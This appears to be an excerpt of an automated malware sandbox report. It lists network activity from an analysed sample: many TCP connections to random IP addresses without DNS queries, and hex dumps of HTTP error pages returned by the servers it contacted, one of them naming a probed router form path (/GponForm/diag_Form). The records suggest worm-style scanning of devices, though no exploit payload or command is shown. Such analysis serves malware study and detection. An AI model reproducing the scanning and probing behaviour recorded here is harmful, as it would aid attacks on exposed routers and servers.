cd f1 93 e7 a7 dc fb 9b 6c 52 e6 34 de 29 51 ea f5 2a 9b 16 4b 6a a9 7f bf cc 66 33 f3 f7 55 31 6b e7 9f 7d f4 e9 ce 0e 51 a3 2c 2e 88 18 53 9a 81 bc fe 28 9d 54 f5 2c af d1 8a e0 13 74 02 ff 4a 7f a3 5f 9f 76 9a 1f fd c2 e5 a4 59 1d 3e 7e 62 db fc d8 ef 53 ad d3 79 76 99 13 5f 67 34 91 b3 34 23 6e 17 a6 2f da 3c 5d 83 cf 69 86 d2 69 9d cf 8a 36 9d 66 f5 2c 5d d5 d5 14 12 b1 bc 18 f9 a0 26 44 c0 ab 9c 9a 88 a0 14 44 c3 b6 38 bf 4e af e6 39 81 bb a6 8e aa ba b8 28 96 59 0b 98 75 b5 18 fb 6f fb bf bf 2c f3 ac 01 4a ed ba 5e a6 6d 85 97 6b f3 76 29 98 65 cb 59 da d6 d7 69 76 91 15 4b 1f d2 e3 bb 6f 98 c5 e8 a1 5f f5 63 fa 0d 64 d7 3f 1a e6 f5 b4 cc 96 17 6b e2 86 cf 3e fa 69 12 00 f9 d0 d0 f1 ee dd 79 d1 b4 55 7d 3d 06 bb 6d dd 39 e4 8f 1f 13 b7 a3 15 37 7a 7c 97 08 b3 c0 af 8f ef 2a 3b 13

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 125.142.139.91
Source: unknown	TCP traffic detected without corresponding DNS query: 205.124.213.207
Source: unknown	TCP traffic detected without corresponding DNS query: 153.229.65.202
Source: unknown	TCP traffic detected without corresponding DNS query: 46.3.169.39
Source: unknown	TCP traffic detected without corresponding DNS query: 105.166.137.150
Source: unknown	TCP traffic detected without corresponding DNS query: 121.159.104.6
Source: unknown	TCP traffic detected without corresponding DNS query: 78.233.217.54
Source: unknown	TCP traffic detected without corresponding DNS query: 173.124.45.94
Source: unknown	TCP traffic detected without corresponding DNS query: 41.61.179.158
Source: unknown	TCP traffic detected without corresponding DNS query: 217.132.116.242
Source: unknown	TCP traffic detected without corresponding DNS query: 220.50.66.153
Source: unknown	TCP traffic detected without corresponding DNS query: 68.208.81.105
Source: unknown	TCP traffic detected without corresponding DNS query: 138.183.57.233
Source: unknown	TCP traffic detected without corresponding DNS query: 76.69.130.42
Source: unknown	TCP traffic detected without corresponding DNS query: 81.157.18.69
Source: unknown	TCP traffic detected without corresponding DNS query: 25.117.44.31
Source: unknown	TCP traffic detected without corresponding DNS query: 159.48.209.196
Source: unknown	TCP traffic detected without corresponding DNS query: 154.37.153.102
Source: unknown	TCP traffic detected without corresponding DNS query: 137.50.209.196
Source: unknown	TCP traffic detected without corresponding DNS query: 170.247.26.46
Source: unknown	TCP traffic detected without corresponding DNS query: 146.252.138.219
Source: unknown	TCP traffic detected without corresponding DNS query: 130.245.77.217
Source: unknown	TCP traffic detected without corresponding DNS query: 170.248.31.222
Source: unknown	TCP traffic detected without corresponding DNS query: 68.69.157.29
Source: unknown	TCP traffic detected without corresponding DNS query: 142.82.165.34
Source: unknown	TCP traffic detected without corresponding DNS query: 186.197.154.193
Source: unknown	TCP traffic detected without corresponding DNS query: 199.253.175.69
Source: unknown	TCP traffic detected without corresponding DNS query: 199.240.101.94
Source: unknown	TCP traffic detected without corresponding DNS query: 33.160.138.35
Source: unknown	TCP traffic detected without corresponding DNS query: 29.14.250.60
Source: unknown	TCP traffic detected without corresponding DNS query: 44.230.88.116
Source: unknown	TCP traffic detected without corresponding DNS query: 173.212.119.218
Source: unknown	TCP traffic detected without corresponding DNS query: 42.217.20.173
Source: unknown	TCP traffic detected without corresponding DNS query: 43.190.131.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.248.206.34
Source: unknown	TCP traffic detected without corresponding DNS query: 4.143.102.140
Source: unknown	TCP traffic detected without corresponding DNS query: 27.174.228.124
Source: unknown	TCP traffic detected without corresponding DNS query: 112.81.89.51
Source: unknown	TCP traffic detected without corresponding DNS query: 129.241.209.154
Source: unknown	TCP traffic detected without corresponding DNS query: 68.252.36.133
Source: unknown	TCP traffic detected without corresponding DNS query: 221.149.172.42
Source: unknown	TCP traffic detected without corresponding DNS query: 189.97.112.66
Source: unknown	TCP traffic detected without corresponding DNS query: 87.235.240.17
Source: unknown	TCP traffic detected without corresponding DNS query: 201.214.117.34
Source: unknown	TCP traffic detected without corresponding DNS query: 9.171.24.117
Source: unknown	TCP traffic detected without corresponding DNS query: 171.221.140.142
Source: unknown	TCP traffic detected without corresponding DNS query: 186.104.158.59
Source: unknown	TCP traffic detected without corresponding DNS query: 19.55.75.43
Source: unknown	TCP traffic detected without corresponding DNS query: 138.111.158.127

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundSet-Cookie: CookieConsentPolicy=0:0; domain=161.71.2.41; path=/; expires=Sat, 21-Jan-2023 03:32:59 GMT; Max-Age=31536000Set-Cookie: LSKey-c$CookieConsentPolicy=0:0; domain=161.71.2.41; path=/; expires=Sat, 21-Jan-2023 03:32:59 GMT; Max-Age=31536000X-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockContent-Security-Policy: upgrade-insecure-requestsX-Robots-Tag: noneCache-Control: must-revalidate,no-cache,no-storeContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedData Raw: 37 62 34 0d 0a 3c 74 61 62 6c 65 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 0a 3c 74 72 3e 3c 74 64 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 74 3b 22 3e 55 52 4c 20 4e 6f 20 4c 6f 6e 67 65 72 20 45 78 69 73 74 73 3c 2f 73 70 61 6e 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 64 3e 59 6f 75 20 68 61 76 65 20 61 74 74 65 6d 70 74 65 64 20 74 6f 20 72 65 61 63 68 20 61 20 55 52 4c 20 74 68 61 74 20 6e 6f 20 6c 6f 6e 67 65 72 20 65 78 69 73 74 73 20 6f 6e 20 73 61 6c 65 73 66 6f 72 63 65 2e 63 6f 6d 2e 20 3c 62 72 2f 3e 3c 62 72 2f 3e 0a 0a 59 6f 75 20 6d 61 79 20 68 61 76 65 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 61 66 74 65 72 20 63 6c 69 63 6b 69 6e 67 20 6f 6e 20 61 20 64 69 72 65 63 74 20 6c 69 6e 6b 20 69 6e 74 6f 20 74 68 65 20 61 70 70 6c 69 63 61 74 69 6f 6e 2e 20 54 68 69 73 20 64 69 72 65 63 74 20 6c 69 6e 6b 20 6d 69 67 68 74 20 62 65 3a 20 3c 62 72 2f 3e 0a 26 23 38 32 32 36 3b 20 41 20 62 6f 6f 6b 6d 61 72 6b 20 74 6f 20 61 20 70 61 72 74 69 63 75 6c 61 72 20 70 61 67 65 2c 20 73 75 63 68 20 61 73 20 61 20 72 65 70 6f 72 74 20 6f 72 20 76 69 65 77 20 3c 62 72 2f 3e 0a 26 23 38 32 32 36 3b 20 41 20 6c 69 6e 6b 20 74 6f 20 61 20 70 61 72 74 69 63 75 6c 61 72 20 70 61 67 65 20 69 6e 20 74 68 65 20 43 75 73 74 6f 6d 20 4c 69 6e 6b 73 20 73 65 63 74 69 6f 6e 20 6f 66 20 79 6f 75 72 20 48 6f 6d 65 20 54 61 62 2c 20 6f 72 20 61 20 43 75 73 74 6f 6d 20 4c 69 6e 6b 20 3c 62 72 2f 3e 0a 26 23 38 32 32 36 3b 20 41 20 6c 69 6e 6b 20 74 6f 20 61 20 70 61 72 74 69 63 75 6c 61 72 20 70 61 67 65 20 69 6e 20 79 6f 75 72 20 65 6d 61 69 6c 20 74 65 6d 70 6c 61 74 65 73 20 3c 62 72 2f 3e 3c 62 72 2f 3e 0a 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 74 68 72 6f 75 67 68 20 61 20 62 6f 6f 6b 6d 61 72 6b 2c 20 79 6f 75 20 61 72 65 20 70 72 6f 62 61 62 6c 79 20 74 72 79 69 6e 67 20 74 6f 20 61 63 63 65 73 73 20 73 6f 6d 65 74 68 69 6e 67 20 74 68 61 74 20 68 61 73 20 6d 6f 76 65 64 2e 20 50 6c 65 61 73 65 20 75 70 64 61 74 65 20 79 6f 75 72 20 62 6f 6f 6b 6d 61 72 6b 2e 20 3c 62 72 2f 3e 0a 3c 62 72 2f 3e 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 74 68 72 6f 75 67 68 20 61 6e 79 20 6f 66 20 74 68 65 20 6f 74 68 65 72 20 64 69 72 65 63 74 20 6c 69 6e 6b 73 Data Ascii: 7b4<table cellspacing=10><tr><td><span style="font-weight: bold;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 21 Jan 2022 03:33:06 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 21 Jan 2022 03:33:06 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 21 Jan 2022 03:33:27 GMTServer: Apache/2.4.38 (Debian)Content-Length: 292Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 39 32 2d 31 31 38 2d 32 36 2d 35 38 2e 68 6f 73 74 73 2e 6d 68 6f 73 74 69 6e 67 2e 68 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.38 (Debian) Server at 92-118-26-58.hosts.mhosting.hu Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/html; charset=UTF-8Content-Length: 3368Connection: closeP3P: CP="CAO PSA OUR"Expires: Thu, 01 Jan 1970 00:00:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 32 31 34 2e 37 35 2e 31 37 36 2e 31 34 38 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 23 63 7b 62 6f 72 64 65 72 3a 33 70 78 20 73 6f 6c 69 64 20 23 61 61 61 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 6d 61 72 67 69 6e 3a 32 30 3b 70 61 64 64 69 6e 67 3a 32 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 0a 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 2c 68 37 2c 68 38 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 0a 68 32 2c 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 3b 7d 0a 68 31 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 63 6f 6c 6f 72 3a 23 63 63 30 30 30 30 3b 7d 0a 68 32 7b 63 6f 6c 6f 72 3a 23 33 33 30 30 36 36 3b 7d 0a 68 33 7b 63 6f 6c 6f 72 3a 23 36 36 36 3b 7d 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 63 6f 6c 6f 72 3a 23 36 36 36 3b 7d 0a 68 35 7b 6d 61 72 67 69 6e 3a 32 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 63 6f 6c 6f 72 3a 23 36 36 36 3b 7d 0a 68 36 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 63 6f 6c 6f 72 3a 23 63 63 30 30 30 30 3b 7d 0a 68 37 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 63 6f 6c 6f 72 3a 23 33 33 30 30 36 36 3b 7d 0a 68 38 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 35 36 70 78 3b 63 6f 6c 6f 72 3a 23 33 33 30 30 36 36 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 7d 0a 62 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 63 6f 6c 6f 72 3a 23 63 63 30 30 30 30 3b 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 65 37 65 38 65 39 22 3e 0a 3c 64 69 76 20 69 64 3d 22 63 22 3e 0a 3c 68 38 3e 3c 70 3e 20 55 53 43 59 42 45 52 43 4f 4d 20 3c 2f 70 3e 3c 2f 68 38 3e 0a 0a 3c 68 31 3e 20 41 50 50 4c 49 43 41 54 49 4f 4e 20 42 4c 4f 43 4b 45 44 20 3c 2f 68 31 3e 3c 62 72 3e 3c 68 72 3e 3c 62 72 3e 3c 68 32 3e 3c 70 3e 59 6f 75 20 68 61 76 65 20 61 74 74 65 6d 70 74 65 64 20 74 6f 20 61 63 63 65 73 73 20 61 20 62 6c 6f 63 6b 65 64 20 77 65 62 73 69 74 65 2e 20 41 63 63 65 73 73 20 74 6f 20 74 68 69 73 20 77 65 62 73 69 74 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 66 6f 72 20 6f 70 65 72 61 74 69 6f 6e 61 6c 20 72 65 61 73 6f 6e 73 20 62 79 20 74 68 65 20 44 4f 44 20 45 6e 74 65 72 70 72 69 73 65 2d 4c
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5Set-Cookie: security_session_verify=25bea19ce72247a1479c870555f9acf3; expires=Mon, 24-Jan-22 11:33:39 GMT; path=/; HttpOnlyDate: Fri, 21 Jan 2022 03:33:38 GMTConnection: closeContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 21 Jan 2022 03:33:48 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/7.2.20Content-Length: 216Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 47 70 6f 6e 46 6f 72 6d 2f 64 69 61 67 5f 46 6f 72 6d 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /GponForm/diag_Form was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-control:no-cache
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveContent-Type: text/htmlTransfer-Encoding: chunkedContent-Encoding: gzipVary: Accept-EncodingDate: Fri, 21 Jan 2022 03:34:24 GMTServer: LiteSpeedData Raw: 31 33 33 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a d9 72 ab ca 7a be df 4f 41 9c 4a 72 4e b1 bc 98 25 e4 63 af 04 10 93 24 10 20 81 84 52 a9 5d 08 9a 41 8c 62 96 52 79 a0 bc 46 9e 2c 85 6c 2f cb b2 bd d7 4e 2a 17 e9 1b 44 ff dd df 3f ff dd ea e6 b7 df 7e 7b fc bb e9 92 5b db 1a 0f 85 75 9a fc f8 ed f1 f9 01 41 10 f4 18 02 c7 fb f1 db e5 67 0a 6a 07 0a eb ba b8 07 c7 26 6a 9f ee b8 3c ab 41 56 df d7 a7 02 dc 41 ee f3 db d3 5d 0d fa 1a 19 20 fe 06 b9 a1 53 56 a0 7e 6a 6a ff 9e be fb 12 c7 71 43 70 3f cc 2f f3 e4 0a 28 cb ef dd 81 f4 e5 44 ad 74 82 d4 f9 9f cc e0 fb 22 2a 41 75 35 05 7d 87 9e 39 29 78 ba 6b 23 d0 15 79 59 5f 0d eb 22 af 0e 9f 3c d0 46 2e b8 bf bc 7c 83 a2 2c aa 23 27 b9 af 5c 27 01 4f d8 f7 9f 50 75 54 27 e0 07 89 92 90 9a d7 90 90 37 99 f7 88 3c 77 3e 9b b2 aa 4f 09 80 06 bb bd 98 cb ad aa 17 39 06 53 ef 73 ef 04 fd fb 65 e8 f0 3a 34 3f cf ea 7b df 49 a3 e4 f4 00 31 65 e4 24 df 20 09 24 2d a8 23 d7 f9 06 55 4e 56 dd 57 a0 8c fc bf 7d 9c 56 45 67 f0 00 61 64 d1 bf 27 26 51 06 ee 43 10 05 61 fd 00 61 df 49 9c a6 c6 18 89 4f de 8f da 3b 6e 1c 94 83 0e f7 6e 9e e4 e5 03 f4 f7 fe a5 bd 1f f6 4a c3 05 02 27 d0 f7 b4 c2 f1 bc 28 0b 1e a0 9b fe d4 29 83 28 7b d7 fd 1f 3f c5 af 80 5b 47 79 f6 0d f2 f3 bc 06 e5 8d 3d bc a8 2a 12 e7 f4 00 ed 93 dc 8d ff 0f d8 7d 1f e2 cf 89 b2 0f 9c 9e 85 bc 4f 80 5f 3f 40 4e 53 e7 ef 99 bd 90 cb 67 2b 7e a4 bf e9 0e 61 e8 b5 07 de 34 fd 5e 82 aa c8 b3 0a dc 47 99 9f df 28 fa 6a 57 ee d2 de 78 5f 4d af 6a a7 6e aa 7b 37 f7 c0 cd e4 4b d4 3c bb 9f 42 d1 7f f8 a3 d9 25 70 aa 3c fb 7a 3e 4e 5d cf 1f 42 f2 2b 17 5c 49 76 b1 a9 5b 5f f4 fa f6 d3 b3 df 9f 79 dd 0f 85 e2 86 e1 ab b6 e8 a5 7d 2a ef 10 4b 43 60 38 c9 67 e6 ba 8a d6 12 14 c0 a9 1f a0 2c bf 7f fe f9 06 37 88 7f 35 f2 95 2b 3e 21 18 92 79 3f ec 95 26 5c da 1b ed 4a cb 5b 89 9c 2f 94 fa f3 10 f7 51 0d d2 ea 06 e6 67 24 e1 68 d1 7f 48 a5 28 7b 4b e5 09 f1 45 a0 5d fb e3 06 fd 25 8e f7 79 5d e7 e9 03 34 f0 78 53 f6 67 05 7a 29 25 a3 6b e2 95 25 de e1 df 9a 61 70 f7 bd 07 dc bc 74 06 ff 3d 40 4d e6 81 72 28 42 ef 19 bd 5a 9c c4 69 96 bb f2 c6 97 7c 1e c2 bc 05 e5 55 7c bd 17 e3 c1 cf dd a6 fa 9a ec b8 75 d4 de 66 ce ab 10 38 33 22 27 a3 37 01 af 84 f8 3a 8a 5f eb da 67 8e ba 4a 49 ec 0b 33 36 c9 8d 6f 7e 66 5a 94 5d 6a f6 27 35 2f 89 aa fa fe b2 ac 0c 01 9f 01 28 6f ea 2a f2 c0 e5 e5 4d fc c1 91 af d2 dd 14 e3 9f e1 75 d5 ff a6 6d 93 40 49 74 23 96 9f e4 43 7e 0d 95 f1 3d 87 8b a7 9d 24 0a b2 07 c8 05 59 0d ca 37 fa 1b e4 f7 9b bc 79 09 fa cf 38 5d 16 dc 07 08 fb aa 86 0d 75 f3 3e 4a 9d e0 d6 8d 3f 95 fa b2 f6 5e a6 0e bb 9c 28 0b 6e f5 1b d6 dc ee 65 7d dc e7 89 f7 a6 c5 60 c7 6b 2d 3f da a0 cb 4b ef 7e 5f 02 27 7e 80 2e 8f 7b 27 49 de 03 fc 29 ad 2a 50 b6 a0 84 1c cf 2b 41 75 5b 12 be 16 e1 cd cc 9f 2e 9f d7 13 6f 3d 74 1d 23 a3 9b 52 f3 01 f6
